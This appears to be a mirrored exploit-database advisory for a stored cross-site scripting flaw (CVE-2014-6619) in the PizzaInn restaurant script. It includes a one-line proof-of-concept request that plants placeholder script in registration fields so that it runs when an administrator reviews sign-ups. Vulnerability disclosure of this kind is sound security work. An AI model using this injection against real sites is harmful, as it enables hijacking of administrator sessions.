Skip to content
cyberexploits
webappphptext

Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting

Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting

Publié le 2014-09-24

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/34760.txt7eac4c3a
raw
Title:     Pizza Inn Registration Stored XSS

Severity:   High

CVE-ID:   CVE-2014-6619

Release Date:  20 September 2014 

Author:   Kenneth F. Belva

Websites:  http://silverbackventuresllc.com

    http://xssWarrior.com 

    http://securitymaverick.com

Twitter:   @infosecmaverick

Contact:  Please use website contact form.

Mail: 

URL:     http://sourceforge.net/projects/restaurantmis/

Vendor: 

Remote Exploit:  Yes



Discovered with: xssWarrior - http://xssWarrior.com





Description:

============



On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.





Proof of Concept :

==================



http://[domain]/PizzaInn/register-exec.php

fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register

Voir sur GitHub